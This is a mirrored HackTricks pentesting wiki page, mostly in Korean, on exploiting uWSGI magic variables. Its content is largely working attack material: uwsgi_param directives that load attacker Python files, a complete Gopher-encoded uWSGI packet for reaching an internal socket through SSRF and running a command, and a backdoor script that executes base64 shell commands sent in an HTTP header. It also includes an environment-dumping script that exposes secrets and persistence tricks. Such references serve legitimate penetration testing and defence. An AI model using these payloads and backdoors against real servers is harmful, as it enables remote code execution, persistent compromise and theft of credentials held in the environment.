maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/wsgi.md

6.4 KiB
Raw Blame History

WSGI Post-Exploitation Tricks

{{#include ../../banners/hacktricks-training.md}}

WSGI 개요

Web Server Gateway Interface (WSGI)는 웹 서버가 웹 애플리케이션과 통신하는 방식과, 웹 애플리케이션들이 하나의 요청을 처리하기 위해 체인처럼 연결되는 방식을 설명하는 명세입니다. uWSGI는 가장 널리 사용되는 WSGI 서버 중 하나로, 종종 Python 웹 애플리케이션을 서비스하는 데 사용됩니다.

uWSGI Magic Variables Exploitation

uWSGI는 서버 동작을 동적으로 구성하는 데 사용할 수 있는 특수한 "magic variables"를 제공합니다. 이 변수들은 HTTP headers를 통해 설정할 수 있으며, 적절히 검증되지 않으면 심각한 보안 취약점으로 이어질 수 있습니다.

주요 악용 가능한 변수

UWSGI_FILE - 임의 파일 실행

uwsgi_param UWSGI_FILE /path/to/python/file.py;

이 변수는 임의의 Python 파일을 WSGI 애플리케이션으로 로드하고 실행할 수 있도록 허용합니다. 공격자가 이 파라미터를 제어할 수 있다면 Remote Code Execution (RCE)를 수행할 수 있습니다.

UWSGI_SCRIPT - 스크립트 로딩

uwsgi_param UWSGI_SCRIPT module.path:callable;
uwsgi_param SCRIPT_NAME /endpoint;

지정된 스크립트를 새로운 애플리케이션으로 로드합니다. 파일 업로드나 쓰기 기능과 결합되면 RCE로 이어질 수 있습니다.

UWSGI_MODULE and UWSGI_CALLABLE - 동적 모듈 로딩

uwsgi_param UWSGI_MODULE malicious.module;
uwsgi_param UWSGI_CALLABLE evil_function;
uwsgi_param SCRIPT_NAME /backdoor;

이 파라미터들은 임의의 Python 모듈을 로드하고 그 내부의 특정 함수를 호출할 수 있게 해준다.

UWSGI_SETENV - 환경 변수 조작

uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;

환경 변수를 수정하는 데 사용될 수 있으며, 애플리케이션 동작에 영향을 주거나 악의적인 구성을 로드할 수 있습니다.

UWSGI_PYHOME - Python 환경 조작

uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;

Python virtual environment을 변경해 잠재적으로 악성 packages나 다른 Python interpreters를 로드할 수 있습니다.

UWSGI_CHDIR - Directory Traversal

uwsgi_param UWSGI_CHDIR /etc/;

요청을 처리하기 전에 작업 디렉터리를 변경하며, 이는 path traversal attacks에 악용될 수 있다.

SSRF + Gopher로

공격 벡터

uWSGI가 SSRF (Server-Side Request Forgery)를 통해 접근 가능할 때, 공격자는 내부 uWSGI socket과 상호작용하여 magic variables를 악용할 수 있다. 특히 다음과 같은 경우에 위험하다:

  1. 애플리케이션에 SSRF 취약점이 있다
  2. uWSGI가 내부 port/socket에서 실행 중이다
  3. 애플리케이션이 magic variables를 올바르게 검증하지 않는다

uWSGI는 config 파일 uwsgi.inisocket = 127.0.0.1:5000가 포함되어 있어 SSRF를 통해 웹 애플리케이션에서 접근 가능하게 된다.

Exploitation Example

Step 1: Create Malicious Payload

먼저, 서버에서 접근 가능한 파일에 Python 코드를 주입한다(서버 내부 파일 쓰기, 파일 확장자는 상관없음):

# Payload injected into a JSON profile file
import os
os.system("/readflag > /app/profiles/result.json")

2단계: uWSGI 프로토콜 요청 생성

Gopher 프로토콜을 사용해 원시 uWSGI 패킷을 전송합니다:

gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json

This payload:

  • uWSGI의 포트 5000에 연결합니다.
  • 악성 파일을 가리키도록 UWSGI_FILE을 설정합니다.
  • uWSGI가 해당 Python 코드를 로드하고 실행하도록 강제합니다.

uWSGI Protocol Structure

uWSGI 프로토콜은 다음과 같은 바이너리 형식을 사용합니다:

  • 변수는 길이 접두사가 붙은 문자열로 인코딩됩니다.
  • 각 변수는 다음을 가집니다: [name_length][name][value_length][value]
  • 패킷은 전체 크기를 포함하는 헤더로 시작합니다

Post-Exploitation Techniques

1. Persistent Backdoors

File-based Backdoor

# backdoor.py
import subprocess
import base64

def application(environ, start_response):
cmd = environ.get('HTTP_X_CMD', '')
if cmd:
result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
else:
response = "Backdoor active"

start_response('200 OK', [('Content-Type', 'text/plain')])
return [response.encode()]

그런 다음 UWSGI_FILE을 사용하여 이 backdoor를 로드합니다:

uwsgi_param UWSGI_FILE /tmp/backdoor.py;
uwsgi_param SCRIPT_NAME /admin;

Environment-based Persistence

uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.8/site-packages;

2. 정보 노출

Environment Variable Dumping

# env_dump.py
import os
import json

def application(environ, start_response):
env_data = {
'os_environ': dict(os.environ),
'wsgi_environ': dict(environ)
}

start_response('200 OK', [('Content-Type', 'application/json')])
return [json.dumps(env_data, indent=2).encode()]

파일 시스템 접근

파일 서빙과 결합된 UWSGI_CHDIR를 사용하여 민감한 파일에 접근하세요:

uwsgi_param UWSGI_CHDIR /etc/;
uwsgi_param UWSGI_FILE /app/file_server.py;

3. Privilege Escalation

Socket Manipulation

uWSGI가 권한이 상승된 상태로 실행되는 경우, attackers가 socket permissions를 조작할 수 있습니다:

uwsgi_param UWSGI_CHDIR /tmp;
uwsgi_param UWSGI_SETENV UWSGI_SOCKET_OWNER=www-data;

구성 재정의

# malicious_config.py
import os

# Override uWSGI configuration
os.environ['UWSGI_MASTER'] = '1'
os.environ['UWSGI_PROCESSES'] = '1'
os.environ['UWSGI_CHEAPER'] = '1'

참고자료

{{#include ../../banners/hacktricks-training.md}}